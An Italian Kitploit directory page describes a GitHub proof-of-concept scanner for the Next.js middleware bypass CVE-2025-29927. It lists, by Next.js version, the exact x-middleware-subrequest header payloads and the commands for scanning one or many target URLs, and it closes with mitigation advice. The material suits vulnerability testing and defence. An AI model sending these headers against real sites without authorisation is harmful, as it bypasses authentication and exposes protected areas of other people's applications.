Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
poc-nextjs-CVE-2025-29927 | Kitploit
Strumenti/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner di vulnerabilità middleware subrequest di Next.js

Un robusto strumento proof-of-concept (PoC) per rilevare la vulnerabilità del middleware di Next.js (CVE-2025-29927).

Panoramica

Questo strumento testa una vulnerabilità critica nelle applicazioni Next.js in cui l'header x-middleware-subrequest può essere utilizzato per bypassare i controlli di sicurezza implementati nel middleware. L'exploit prevede l'invio di richieste HTTP con specifici header dannosi, a seconda della versione di Next.js.

Come funziona l'exploit

Secondo la ricerca, esistono diversi payload per diverse versioni di Next.js:

  1. Versioni precedenti alla 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. Versioni dalla 12.2 in poi:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    oppure

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (se l'applicazione utilizza la directory src)

  3. Versioni più recenti (come la 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    oppure

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

La nostra PoC testa automaticamente tutti questi payload e segnala quale ha avuto successo.

Funzionalità

  • Test di uno o più target
  • Scansione concorrente con multithreading
  • Percorsi di richiesta personalizzabili
  • Test automatico di tutti i payload possibili
  • Output dettagliato e colorato nel terminale
  • Esportazione dei risultati in JSON
  • Gestione robusta degli errori
  • Rilevamento completo delle vulnerabilità

Requisiti

  • Python 3.7+
  • Pacchetti necessari:
    • requests
    • colorama

Installazione

root@kitploit:~
# Clone o repositório ou baixe os arquivos
# Navegue até o diretório
cd poc-nextjs-2025

# Instale os pacotes necessários
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python main.py -u https://exemplo.com   # Testar uma única URL
python main.py -f alvos.txt             # Testar múltiplas URLs de um arquivo

Argomenti della riga di comando

Esempi

root@kitploit:~
# Escaneamento básico de um único alvo
python main.py -u https://exemplo.com

# Escanear múltiplos alvos com caminhos personalizados
python main.py -f alvos.txt -p /api/users,/admin,/dashboard

# Escanear com maior concorrência e timeout mais longo
python main.py -u https://exemplo.com -t 10 --timeout 15

# Salvar resultados em um arquivo JSON
python main.py -u https://exemplo.com -o resultados_scan.json

Metodologia di rilevamento

Lo scanner funziona tramite:

  1. Invio di una richiesta normale al target
  2. Invio di richieste con diverse varianti dell'header x-middleware-subrequest in base alle versioni di Next.js
  3. Confronto delle risposte per identificare indicatori di vulnerabilità:
    • Richiesta normale bloccata (4xx/5xx) ma richiesta exploit consentita (2xx)
    • Differenza significativa nel contenuto della risposta
    • Indicatori di bypass di autenticazione/autorizzazione

Mitigazione

Se scopri applicazioni vulnerabili, applica queste mitigazioni:

  • Aggiorna a Next.js 14.2.25, 15.2.3 o versioni successive
  • Implementa un middleware che blocchi le richieste con l'header x-middleware-subrequest
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
Scarica lo strumento
OpzioneDescrizione
-u, --url URLURL di destinazione da scansionare
-f, --file ARQUIVOFile contenente più URL da scansionare (una per riga)
-p, --paths CAMINHOSElenco di percorsi da testare separati da virgola (predefiniti: percorsi comuni)
-t, --threads NNumero di thread concorrenti (predefinito: 5)
-o, --output ARQUIVOSalva i risultati in un file JSON
--timeout NTimeout della richiesta in secondi (predefinito: 10)